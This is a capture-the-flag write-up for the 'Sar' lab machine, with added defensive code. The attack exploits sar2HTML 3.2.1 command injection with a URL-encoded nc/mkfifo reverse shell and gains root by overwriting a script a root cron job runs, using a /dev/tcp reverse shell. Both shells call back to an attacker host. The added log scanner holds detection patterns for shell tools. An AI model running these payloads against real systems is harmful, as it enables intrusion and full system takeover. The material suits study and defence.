# Sar

`sar2HTML` `cronjob`

* Machine name: Sar
* Difficulty: Easy
* OS: Linux

## Enumeration

### NMAP

```
Nmap scan report for 192.168.228.35
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:40:be:13:cf:51:7d:d6:a5:9c:64:c8:13:e5:f2:9f (RSA)
|   256 8a:4e:ab:0b:de:e3:69:40:50:98:98:58:32:8f:71:9e (ECDSA)
|_  256 e6:2f:55:1c:db:d0:bb:46:92:80:dd:5f:8e:a3:0a:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.228.35/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.228.35/__24-08-26_09-49-52.txt

Target: http://192.168.228.35/

[09:49:52] Starting: 
[09:49:55] 403 -  279B  - /.ht_wsr.txt
[09:49:55] 403 -  279B  - /.htaccess.orig
[09:49:55] 403 -  279B  - /.htaccess.sample
[09:49:55] 403 -  279B  - /.htaccess.save
[09:49:55] 403 -  279B  - /.htaccess_extra
[09:49:55] 403 -  279B  - /.htaccess_orig
[09:49:55] 403 -  279B  - /.htaccess_sc
[09:49:55] 403 -  279B  - /.htaccessBAK
[09:49:55] 403 -  279B  - /.htaccessOLD
[09:49:55] 403 -  279B  - /.htaccessOLD2
[09:49:55] 403 -  279B  - /.htm
[09:49:55] 403 -  279B  - /.html
[09:49:55] 403 -  279B  - /.htpasswd_test
[09:49:55] 403 -  279B  - /.htpasswds
[09:49:55] 403 -  279B  - /.httr-oauth
[09:49:56] 403 -  279B  - /.htaccess.bak1
[09:49:56] 403 -  279B  - /.php
[09:50:20] 200 -   24KB - /phpinfo.php
[09:50:23] 200 -    9B  - /robots.txt
[09:50:23] 403 -  279B  - /server-status/
[09:50:23] 403 -  279B  - /server-status

Task Completed
```

robots.txt: sar2HTML

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FdW1dY9Wk3QAsB8rxtjME%2F739403d7922dd4dc922047a4ec1ea2b0.png?alt=media&#x26;token=72fd76c3-b89f-4d62-905a-f5f1f36fcc2b" alt=""><figcaption></figcaption></figure>

Version: 3.2.1

## Initial access

{% embed url="https://www.exploit-db.com/exploits/47204" %}

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FAa3moJPU9sKdosOEkjHD%2F17a5a0368c6615a252f2773bc6e8fb71.png?alt=media&#x26;token=1f6a3205-0c68-450b-a9a2-684c383203da" alt=""><figcaption></figcaption></figure>

We inject the nc mkfifo payload, URL-encoded, calling back to port 1234.

```
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.224%201234%20%3E%2Ftmp%2Ff
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.228.35] 38454
bash: cannot set terminal process group (1018): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ ls
```
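From the defender's side, the request above leaves an easy-to-spot trace in the Apache access log: the whole shell pipeline arrives URL-encoded inside one query parameter. The following is an added example, not part of this write-up or of sar2HTML. It parses access-log lines, URL-decodes each query parameter and flags values that carry shell metacharacters or the tokens the payload relies on. The log lines are constructed, and the `plot` parameter name is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache access log lines (not taken from the target). The first carries
# the URL-encoded mkfifo/nc payload shown above; the "plot" parameter name is assumed.
SAMPLE_LOG = """\
192.168.45.224 - - [26/Aug/2024:09:52:10 +0000] "GET /sar2HTML/index.php?plot=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.224%201234%20%3E%2Ftmp%2Ff HTTP/1.1" 200 512 "-" "curl/7.88.1"
192.168.45.224 - - [26/Aug/2024:09:50:23 +0000] "GET /robots.txt HTTP/1.1" 200 9 "-" "Mozilla/5.0"
10.0.0.7 - - [26/Aug/2024:10:01:00 +0000] "GET /sar2HTML/index.php?plot=cpu&host=web01 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Common/combined log format: source, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Separators that chain commands, and names that rarely belong in a plotting parameter.
SHELL_METACHARS = re.compile(r"[;|`]|\$\(|&&")
SHELL_TOKENS = re.compile(r"/dev/tcp|/bin/(?:ba)?sh|\b(?:mkfifo|nc|ncat|bash|sh|curl|wget)\b")


def parse_access_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def injection_indicators(target):
    """Decode each query parameter and list the shell-injection indicators found in its value."""
    found = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)  # parse_qsl decoded once; a second pass catches double encoding
        hits = {m.group(0) for m in SHELL_METACHARS.finditer(decoded)}
        hits |= {m.group(0) for m in SHELL_TOKENS.finditer(decoded)}
        if hits:
            found.append({"param": name, "decoded": decoded, "hits": sorted(hits)})
    return found


def scan_log(text):
    """Return one alert per request whose query string carries injection indicators."""
    alerts = []
    for line in text.splitlines():
        entry = parse_access_line(line)
        if entry and (indicators := injection_indicators(entry["target"])):
            alerts.append({**entry, "indicators": indicators})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        for ind in alert["indicators"]:
            print(f"{alert['time']} {alert['src']} param={ind['param']} hits={ind['hits']}")
            print(f"    decoded: {ind['decoded']}")
```

The decoded value is kept in the alert on purpose: an analyst reading `rm /tmp/f;mkfifo /tmp/f;...|nc 192.168.45.224 1234` immediately knows the callback host and port to look for in network logs, which the raw percent-encoded form hides. The same pattern matching applied at a WAF or in Apache's `mod_security` rules would have blocked the request before it reached the vulnerable PHP.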

## Privilege escalation

```
www-data@sar:/home/love$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
```

```
www-data@sar:/var/www/html$ cat finally.sh
#!/bin/sh

./write.sh

www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh

touch /tmp/gateway
```

We have full rights over write.sh (we can also delete and add files in this directory).

```
www-data@sar:/var/www/html$ echo "/bin/bash -i >& /dev/tcp/192.168.45.224/1235 0>&1" > write.sh
```

All that's left is to grab a coffee and wait 5 minutes.

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235
listening on [any] 1235 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.228.35] 44676
bash: cannot set terminal process group (2568): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html# whoami
root
```
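The root cause here is a root cron job whose script chain (`finally.sh` → `write.sh`) ends in a file www-data can overwrite. The following is an added example, not part of this write-up: a small audit that parses `/etc/crontab`, follows `cd DIR && ./script` and one further layer of scripts called from inside those scripts, and reports any executed file that is writable by group/other, owned by a non-root user, or sitting in a directory others can write. It runs against a constructed temp tree that mirrors `finally.sh` and `write.sh` above; the file modes in that tree are assumptions made for the demo.

```python
import os
import re
import shlex
import stat
import tempfile

# Constructed copy of the relevant /etc/crontab lines seen on the target.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user\tcommand
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
25 6\t* * *\troot\ttest -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
"""

CRONTAB_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
SPLIT_CMD = re.compile(r"&&|\|\||;")


def parse_system_crontab(text):
    """(user, command) for every active job in /etc/crontab format (@reboot-style lines ignored)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment or VAR=value assignment
        m = CRONTAB_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def executables_in(cmd, cwd="/"):
    """Absolute paths of programs run *by path* in cmd, tracking 'cd DIR' and skipping 'sudo'.
    Returns (paths, cwd after the command). Bare names (run-parts, test) resolve via PATH and are not checked."""
    paths = []
    for segment in SPLIT_CMD.split(cmd):
        try:
            tokens = [t for t in shlex.split(segment) if t not in ("(", ")")]
        except ValueError:
            continue  # unbalanced quotes: skip rather than guess
        if not tokens:
            continue
        if tokens[0] == "cd" and len(tokens) > 1:
            cwd = os.path.normpath(os.path.join(cwd, tokens[1]))
            continue
        if tokens[0] == "sudo":
            tokens = tokens[1:]
        if tokens and "/" in tokens[0]:
            paths.append(os.path.normpath(os.path.join(cwd, tokens[0])))
    return paths, cwd


def weaknesses(path, fs_root="/", trusted_uids=(0,)):
    """Reasons a non-root user could change what runs at path; fs_root remaps '/' for tests."""
    real = os.path.join(fs_root, path.lstrip("/"))
    reasons = []
    if not os.path.exists(real):
        reasons.append("target missing (creatable by anyone who can write the directory)")
    else:
        st = os.stat(real)
        if trusted_uids is not None and st.st_uid not in trusted_uids:
            reasons.append(f"owned by uid {st.st_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("file writable by group/other")
    parent = os.path.dirname(real)
    if os.path.isdir(parent):
        dm = os.stat(parent).st_mode
        if dm & (stat.S_IWGRP | stat.S_IWOTH) and not dm & stat.S_ISVTX:
            reasons.append("parent directory writable by group/other")
    return reasons


def script_body(real):
    """Non-comment lines of a shell script joined into one command line ('' if unreadable)."""
    try:
        with open(real, errors="replace") as fh:
            return " ; ".join(l.strip() for l in fh if l.strip() and not l.lstrip().startswith("#"))
    except OSError:
        return ""


def audit_crontab(text, fs_root="/", trusted_uids=(0,), depth=2):
    """Every file a root job executes, directly or via called scripts, that non-root can tamper with."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        if user != "root":
            continue
        queue = [(cmd, "/", 0)]
        while queue:
            command, cwd, level = queue.pop()
            paths, cwd = executables_in(command, cwd)
            for p in paths:
                reasons = weaknesses(p, fs_root, trusted_uids)
                if reasons:
                    findings.append({"job": cmd, "path": p, "reasons": reasons})
                if level < depth:  # follow one more layer of scripts called from this one
                    queue.append((script_body(os.path.join(fs_root, p.lstrip("/"))), cwd, level + 1))
    return findings


def build_demo_tree():
    """Temp tree mirroring the target: finally.sh is 0755, write.sh is world-writable (assumed modes)."""
    root = tempfile.mkdtemp(prefix="cronaudit-")
    html = os.path.join(root, "var/www/html")
    os.makedirs(html)
    os.chmod(html, 0o755)
    for name, body, mode in (("finally.sh", "#!/bin/sh\n\n./write.sh\n", 0o755),
                             ("write.sh", "#!/bin/sh\n\ntouch /tmp/gateway\n", 0o777)):
        with open(os.path.join(html, name), "w") as fh:
            fh.write(body)
        os.chmod(os.path.join(html, name), mode)
    return root


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, fs_root=build_demo_tree(), trusted_uids=None):
        print(f"[!] '{f['job']}' runs {f['path']}: {', '.join(f['reasons'])}")
```

Checking only the script named in the crontab would have missed this box: `finally.sh` itself may be root-owned and 0755, and the writable file is the one it calls. That is why the audit follows the chain. The fix on the target side is the usual one: root-run scripts belong outside the web root, owned by root with mode 0755 or stricter, and the `sudo` in the job is redundant since cron already runs it as root.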
